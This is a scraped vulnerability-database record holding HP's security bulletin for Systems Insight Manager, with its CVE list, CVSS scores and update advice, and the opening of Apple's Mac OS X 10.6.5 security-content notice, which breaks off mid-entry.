SUMMARY\r\nPotential security vulnerabilities have been identified in HP Systems Insight Manager (SIM) for HP-UX, Linux,\r\nand Windows. The vulnerabilities could be exploited remotely to execute arbitrary code and other exploits.\r\n\r\nReferences: Adobe Flash Player\r\n\r\nCVE-2008-4546\r\n\r\nCVE-2009-3793\r\n\r\nCVE-2010-1297\r\n\r\nCVE-2010-2160\r\n\r\nCVE-2010-2161\r\n\r\nCVE-2010-2162\r\n\r\nCVE-2010-2163\r\n\r\nCVE-2010-2164\r\n\r\nCVE-2010-2165\r\n\r\nCVE-2010-2166\r\n\r\nCVE-2010-2167\r\n\r\nCVE-2010-2169\r\n\r\nCVE-2010-2170\r\n\r\nCVE-2010-2171\r\n\r\nCVE-2010-2172\r\n\r\nCVE-2010-2173\r\n\r\nCVE-2010-2174\r\n\r\nCVE-2010-2175\r\n\r\nCVE-2010-2176\r\n\r\nCVE-2010-2177\r\n\r\nCVE-2010-2178\r\n\r\nCVE-2010-2179\r\n\r\nCVE-2010-2180\r\n\r\nCVE-2010-2181\r\n\r\nCVE-2010-2182\r\n\r\nCVE-2010-2183\r\n\r\nCVE-2010-2184\r\n\r\nCVE-2010-2185\r\n\r\nCVE-2010-2186\r\n\r\nCVE-2010-2187\r\n\r\nCVE-2010-2188\r\n\r\nCVE-2010-2189\r\n\r\nJava Runtime Environment (JRE)\r\n\r\nCVE-2010-0082\r\n\r\nCVE-2010-0084\r\n\r\nCVE-2010-0085\r\n\r\nCVE-2010-0087\r\n\r\nCVE-2010-0088\r\n\r\nCVE-2010-0089\r\n\r\nCVE-2010-0090\r\n\r\nCVE-2010-0091\r\n\r\nCVE-2010-0092\r\n\r\nCVE-2010-0093\r\n\r\nCVE-2010-0094\r\n\r\nCVE-2010-0095\r\n\r\nCVE-2010-0837\r\n\r\nCVE-2010-0838\r\n\r\nCVE-2010-0839\r\n\r\nCVE-2010-0840\r\n\r\nCVE-2010-0841\r\n\r\nCVE-2010-0842\r\n\r\nCVE-2010-0843\r\n\r\nCVE-2010-0844\r\n\r\nCVE-2010-0845\r\n\r\nCVE-2010-0846\r\n\r\nCVE-2010-0847\r\n\r\nCVE-2010-0848\r\n\r\nCVE-2010-0849\r\n\r\nCVE-2010-0850\r\n\r\nTLS/SSL\r\n\r\nCVE-2009-3555\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows prior to v6.1.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2008-4546 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 4.3\r\nCVE-2009-3793 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-1297 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2160 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2161 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2162 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2163 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2164 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2165 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2166 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2167 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2169 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2170 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2171 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2172 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\nCVE-2010-2173 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2174 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2175 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2176 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2177 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2178 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2179 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\r\nCVE-2010-2180 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2181 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2182 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2183 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2184 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2185 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2186 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2187 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2188 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-2189 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-0082 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0084 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\nCVE-2010-0085 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0087 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0088 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2010-0089 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2010-0090 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8\r\nCVE-2010-0091 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\r\nCVE-2010-0092 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0093 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1\r\nCVE-2010-0094 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0095 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\r\nCVE-2010-0837 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0838 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0839 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0840 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0841 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0842 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0843 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0844 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0845 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0846 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0847 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0848 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0849 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-0850 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHp has provided HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows v6.1 or subsequent to resolve\r\nthese vulnerabilities.\r\nThe HP SIM v6.1 can be downloaded from http://www.hp.com/go/hpsim\r\n\r\nMANUAL ACTIONS: Yes - Update\r\nUpdate to HP SIM v6.1 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a\r\nspecific HP-UX system. It can also download patches and create a depot automatically. For more information\r\nsee: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n=============\r\nSysMgmtServer.MX-CMS\r\nSysMgmtServer.MX-CORE\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-PORTAL\r\nSysMgmtServer.MX-REPO\r\nSysMgmtServer.MX-TOOLS\r\naction: update to HP SIM v6.1 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 12 July 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkw7IkwACgkQ4B86/C0qfVlJ5QCfXkIKuTF7IcPYiRcmqfTLo8aQ\r\nCk0Anij/T6Lor5PRgLg5eharEx5Spcki\r\n=Wfca\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24282", "title": "[security bulletin] HPSBMA02547 SSRT100179 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Execution of Arbitrary Code and Other Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2500", "CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-4010", "CVE-2010-2160", "CVE-2010-1449", "CVE-2010-1832", "CVE-2009-0796", "CVE-2010-3640", "CVE-2010-1845", "CVE-2010-2161", "CVE-2010-1841", "CVE-2010-3786", "CVE-2009-0946", "CVE-2010-1846", "CVE-2010-3785", "CVE-2010-1843", "CVE-2010-3796", "CVE-2010-1833", "CVE-2010-2176", "CVE-2010-3790", "CVE-2010-2941", "CVE-2010-2177", "CVE-2010-2484", "CVE-2010-3798", "CVE-2010-1205", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-0434", "CVE-2010-2531", "CVE-2010-1844", "CVE-2010-1828", "CVE-2010-3789", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-1836", "CVE-2010-2166", "CVE-2010-1834", "CVE-2010-2807", "CVE-2010-1450", "CVE-2010-1847", "CVE-2010-3053", "CVE-2010-2808", "CVE-2010-2173", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-1842", "CVE-2010-0212", "CVE-2010-2165", "CVE-2010-1840", "CVE-2010-2170", "CVE-2010-0001", "CVE-2010-3645", "CVE-2010-0408", "CVE-2010-3638", "CVE-2010-3788", "CVE-2010-2171", "CVE-2010-2520", "CVE-2010-2805", "CVE-2010-2249", "CVE-2010-2806", "CVE-2010-2184", "CVE-2010-1752", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3784", "CVE-2010-3794", "CVE-2010-1811", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3793", "CVE-2010-3054", "CVE-2010-2181", "CVE-2010-3797", "CVE-2010-2163", "CVE-2010-0105", "CVE-2010-2519", "CVE-2010-3976", "CVE-2010-1803", "CVE-2010-2183", "CVE-2010-1850", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-3791", "CVE-2010-2169", "CVE-2010-1831", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-1378", "CVE-2010-2179", "CVE-2010-2498", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-0211", "CVE-2009-2473", "CVE-2010-3783", "CVE-2010-1848", "CVE-2010-2185", "CVE-2010-1837", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-2474", "CVE-2010-2499", "CVE-2010-2497", "CVE-2009-3793", "CVE-2010-1830", "CVE-2010-1838", "CVE-2010-1829", "CVE-2010-2167", "CVE-2010-3795", "CVE-2010-3647", "CVE-2010-1849", "CVE-2010-0397", "CVE-2010-3643", "CVE-2010-2162", "CVE-2009-4134", "CVE-2009-2624", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-3792", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-0205", "CVE-2010-3787", "CVE-2010-2178"], "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shutdown\r\n\r\n Description: A null pointer dereference exists in AFP Server's handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shutdown. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. This issue is addressed through improved path validation. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl's encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services' handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork's URL handling code. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork's handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue by through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText's handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol (IPP) requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services' password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists fsck_hfs' handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees. Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip's handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or 